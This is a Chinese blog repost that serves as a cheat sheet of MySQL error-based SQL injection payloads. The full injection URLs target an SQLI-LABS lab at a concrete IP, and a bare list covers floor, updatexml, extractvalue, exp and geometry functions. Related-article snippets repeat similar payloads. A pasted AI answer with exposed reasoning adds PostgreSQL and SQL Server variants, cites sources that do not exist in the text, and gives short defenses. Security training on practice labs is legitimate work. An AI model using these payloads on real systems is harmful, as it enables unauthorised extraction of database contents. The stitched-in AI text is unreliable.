各种报错注入payload总结——转自郁离歌

最新推荐文章于 2025-04-17 23:15:26 发布
最新推荐文章于 2025-04-17 23:15:26 发布
阅读量5.8k 收藏 11
点赞数
分类专栏: sql注入

郁离歌:https://blog.youkuaiyun.com/like98k/article/details/79646512

 

0x00.序言

关于报错注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。

ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。

ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。

0x01.floor()报错注入

http://43.247.91.228:84/Less-5/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

0x02.extractvalue()报错注入

原理:xpath 函数报错注入

ps:(有长度限制,最长32位)

http://43.247.91.228:84/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+

0x03.updatexml()报错注入

ps:(有长度限制,最长32位)

http://43.247.91.228:84/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

 

0x04.exp()报错注入

原理:利用double 数值类型超出范围进行报错注入

http://43.247.91.228:84/Less-5/?id=1' union select (exp(~(select * FROM(SELECT USER())a))),2,3--+

0x05.利用!来溢出报错注入

原理:利用bigint 溢出进行报错注入

http://43.247.91.228:84/Less-5/?id=1' union select (!(select * from (select user())x) - ~0),2,3--+

0x06.NAME_CONST()

原理:利用数据的重复性。

http://43.247.91.228:84/Less-5/?id=1'union select 1,2,3 from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x --+

0x07.总结

  1. floor()

    and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

    information_schema.tables group by x)a)

  2. updatexml()

    and 1=(updatexml(1,concat(0x3a,(select user())),1))

  3. extractvalue()

    and extractvalue(1,concat(0x5c,(select user())))

  4. exp()

    and exp(~(select * from(select user())a))

  5. multipoint()

    and multipoint((select * from(select * from(select user())a)b))

  6. geometrycollection()

    and geometrycollection((select * from(select * from(select user())a)b))

  7. polygon()

    and polygon((select * from(select * from(select user())a)b))

  8. multipolygon()

    and multipolygon((select * from(select * from(select user())a)b))

  9. linestring()

    and linestring((select * from(select * from(select user())a)b))

  10. multilinestring()

    and multilinestring((select * from(select * from(select user())a)b))

《网络安全自学教程》- SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 1万+
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
报错注入详解
weixin_45253622的博客
03-19 1万+
报错注入 报错注入是SQL注入的一种。 利用前提:页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error() 优点:不需要显示位 缺点:需要输出mysql_error()的报错信息 报错函数 1、floor报错注入 floor()报错注入是利用count()、rand()、floor()、group by 这几个特定的函数结合在一起产生的注入漏洞,准确的说是floor,count,group by冲突报错报错原理:利用数据库表主键不能重复的原理,使用GROUP BY分组,产生主
报错注入常用的三种注入方式(flool ,extractvalue、updatexml)
最新发布
lza20001103的博客
04-17 1023
报错注入常用的三种注入方式(flool ,extractvalue、updatexml)
十种MySQL报错注入
weixin_30889885的博客
01-09 197
1.floor() select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.extractvalue() select * from t...
SQL注入报错注入的一些随笔
郁离歌丶的博客
03-21 4685
0x00.序言关于报错注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。0x01.floor()报错注入http:/...
最常见的SQL报错注入函数(floor、updatexml、extractvalue)及payload总结
Welcome To Myon'Blog !
12-24 8036
extractvalue() 能查询字符串的最大长度为 32,如果我们想要的结果超过 32,就要用 substring() 函数截取或 limit 分页,一次查看最多 32 位。其实有时候我们可以使用group_concat()将所以查询内容列出,但是要取决于题目具体环境,如果无法使用,则使用limit语句来限制查询结果的列数,逐条查询。但是这里回显要么存在,要么无回显,因此无法使用联合查询注入,而且也不存在回显为真或者假两种情况,排除掉盲注,那么这关需要使用的是报错注入
mysql数据库之报错注入常用payload
Websec
02-20 1492
flloor报错注入 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);   ExtractValue报错注入 and extractvalue(1, concat(0x5c, (select table_na...
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在攻击者能够通过输入特定的数据,导致应用程序返回关于其内部结构或数据库状态的错误信息。这种错误信息可以揭示敏感信息,如数据库名称、表名、列名,甚至数据本身,从而为攻击...
SQL注入报错注入
qq_68163788的博客
01-27 3211
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
渗透测试——报错注入
zjdda的博客
05-20 996
1.报错注入原理 由于后台没有对数据库的信息做过滤,会输出到前台显示,那么我们就可以通过制造报错函数,将查询语句带入到数据库中,以报错信息显示出来。 2.报错注入漏洞产生的条件 1)参数用户可控:前端传入的参数内容由用户控制 2)参数带入数据库的查询:传入的参数拼接到 SQL 语句,并且带入数据库的查询 3)对用户输入的数据没有做合法性的判断 4)后台对数据库的信息没做过滤,会输出到前台显示 3.常用哪些函数来制造爆错? extractvalue\updatexml\floor\exp 4.updatex
报错注入函数指南
qq_28624871的博客
05-01 2445
1. geometrycollection() mysql版本5.5   (1)函数解释: GeometryCollection是由1个或多个任意类几何对象构成的几何对象。GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系)。   (2)官方文档中举例的用法如下: GEOMETRYCOLLECTION(POINT(10 10), POINT(30 30), LINESTRING(15 15, 20 20))   (3)报错原因: 因为MYSQL无法使用这样的字符串画
SQL 报错注入详解
2301_78008478的博客
05-08 1212
近期学习 SQL 报错注入,本篇文章为关于报错注入的一些个人理解,如有错误,希望指出 本文使用 sqli-labs 数据库作为示例报错注入方式有很多,其中比较常见的有 floor() 、extractvalue() 、updatexml() 三种,本篇文章主要对这三种进行分析先贴上一个常见的 payload 再进行分析 (sqli-labs Less-5) 复制首先这个 payload 和网上很多的不太一样,查阅网上相关博客时发现大多数的 payload 都是这样写的 复制这个就是把发生报错的 se
extractvalue报错注入
bangyan3903的博客
08-18 3625
查看源码 $uagent = $_SERVER['HTTP_USER_AGENT']; ………… $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); ………… $sql="SELECT users.username, users.password FROM users...
网络安全学习笔记——报错注入
just do it
05-12 183
通过页面的报错回显进行注入,出现错误的时候MySQL就会显示错误,报错注入网上有资源,实际上在使用的时候也是直接在网上的payload上复制粘贴——报错注入首先要有报错的回显点,适用于页面无正常回显。
sql报错注入基础讲解
qq_44060093的博客
09-20 583
报错注入:构造payload让信息通过错误提示回显出来 应用场景:查询不回显内容,会打印错误信息 php代码: if($row) { echo 'you login name:'.$row['username']'; } else { print_r(mysql_errot()); } 如果能让错误信息中返回数据库的内容,即可实现sql注入 凡是可以让错误信息显示的语句,都能实现报错注入 floor()报错注入的方法 select count(*) from information_schema.ta
mysql报错注入原理_MySQL手注之报错注入详解
weixin_29505425的博客
02-02 494
报错注入原理详解往往在注入过程中根据错误回显进行判断,但是现在非常多的Web程序没有正常的错误回显,这样就需要我们利用报错注入的方式来进行SQL注入了。这篇文章会讲解一下报错注入的产生原理和利用案例。当在这个聚合函数,如count函数后如果使分组语句就会把查询的部分以错误的形式显 出来。这些函数分别是:Rand() //随机函数Floor() //取整函数Count() //聚合函数Group b...
几种常见的报错注入类型详解
m0_74312676的博客
07-23 2140
报错注入是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
sql注入报错注入
weixin_47075747的博客
02-28 5629
报错注入 常用的报错注入就两种:extractvalue , updatexml 什么时候使用报错注入呢? 当没有一个合适的数据返回点的时候就需要报错注入注入的时候后端是被注入了的,但是前端没有得到更好的显示。 extractvalue payload: and extractvalue(null,concat(0x7e,(payload),0x7e)) 对数据库进行 xml 文档的故意报错 利用 concat 在后台进行拼接 指定第一个参数为 null ,让他故意报错,讲第二个参数种的语句带入
报错注入是什么?一看你就明白了。报错注入原理+步骤+实战案例
热门推荐
wangyuxiang946的博客
03-12 3万+
报错注入怎么使用,报错注入步骤,报错注入原理,报错注入使用。
报错注入payload
03-14
<think>好的,我现在需要帮助用户查找关于报错注入(error-based SQL injection)的payload示例和解释。用户提到他们可能是在学习安全测试或了解漏洞利用方法。首先,我得回顾自己掌握的SQL注入知识,特别是报错注入的部分。 报错注入是一种利用数据库错误信息来提取数据的方法。当应用程序没有正确过滤用户输入,并且将错误信息直接返回给用户时,攻击者可以构造特定的查询,触发数据库错误,从而通过这些错误信息获取数据库结构或数据。 接下来,我需要确认用户需要的具体内容:payload示例和解释。因此,我应该先列举常见的报错注入技术,并给出对应的payload例子,然后逐一解释其原理。同时,需要注意引用相关的资料,比如用户提供的引用[3]提到了一些攻击技术,但可能更相关的可能是引用[2]中关于PostgreSQL的安全措施,不过用户的问题更偏向于攻击方法,所以可能需要结合一般性的知识。 常见的数据库如MySQL、PostgreSQL、SQL Server在报错注入上有不同的函数和利用方式。例如,MySQL中的updatexml()、extractvalue(),以及利用group by子句的重复列错误;而PostgreSQL可能使用cast函数结合类型换错误。SQL Server则可能利用convert函数或其它方式。 需要确保给出的示例准确,并且语法正确。同时,提醒用户这些方法仅用于教育目的,强调合法授权测试的重要性,符合引用[2]中提到的安全思维模式。 然后,考虑用户可能的后续问题,比如如何防御这类攻击,或者不同数据库之间的差异。因此,在相关问题部分,可以提出防御措施、不同数据库的报错注入差异,以及工具使用的问题。 现在整理思路,分步骤说明报错注入的原理,给出不同数据库的payload示例,并解释每个部分的作用。同时,引用用户提供的资料中的相关内容,比如引用[3]提到的攻击技术,如利用错误信息获取访问权限,但具体到报错注入,可能需要更具体的例子。 最后,确保回答结构清晰,使用中文,并正确应用LaTeX格式,行内公式用$...$,独立公式用$$...$$。同时,生成的相关问题需要与主题紧密相关,帮助用户进一步学习。</think>### 报错注入(Error-Based SQL Injection)Payload示例与原理 报错注入是一种通过触发数据库错误信息来提取数据的攻击技术,常用于**未正确过滤输入且显示错误详情**的Web应用[^3]。以下是常见数据库的payload示例与解析: --- #### 1. **MySQL 报错注入** 利用函数如 `updatexml()` 或 `extractvalue()` 构造XPath语法错误: ```sql ' AND updatexml(1, concat(0x7e, (SELECT user())), 1) -- ``` - **解析**: - `updatexml()` 用于XML解析,第二个参数应为合法XPath表达式。 - `concat(0x7e, (SELECT user()))` 拼接波浪符(`~`)和当前用户信息,导致XPath格式错误。 - 错误信息会包含`~root@localhost`等敏感数据[^2]。 **数学表达示例**: 若数据库版本查询的payload为: $$ \text{payload} = \text{' AND updatexml(1, concat(0x7e, version()), 1) -- } $$ 则错误输出可能包含版本号,如`XPATH syntax error: '~8.0.32'`。 --- #### 2. **PostgreSQL 报错注入** 利用类型换错误或未定义函数: ```sql ' AND 1=cast((SELECT current_user) as int) -- ``` - **解析**: - `cast((SELECT current_user) as int)` 尝试将用户名(字符串)换为整数,触发类型错误。 - 错误信息如 `invalid input syntax for integer: "postgres"` 会泄露当前用户。 --- #### 3. **SQL Server 报错注入** 使用`convert()`函数触发类型换错误: ```sql ' AND 1=convert(int, (SELECT @@version)) -- ``` - **解析**: - `convert(int, ...)` 强制换数据库版本信息(字符串)为整数,导致错误。 - 错误信息会包含完整的版本字符串。 --- ### 防御建议 1. **输入过滤与参数化查询**:使用预编译语句(Prepared Statements)避免SQL拼接。 2. **错误信息隐藏**:禁止向用户返回原始数据库错误详情。 3. **权限最小化**:限制数据库账户权限,避免使用高权限账户连接应用[^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值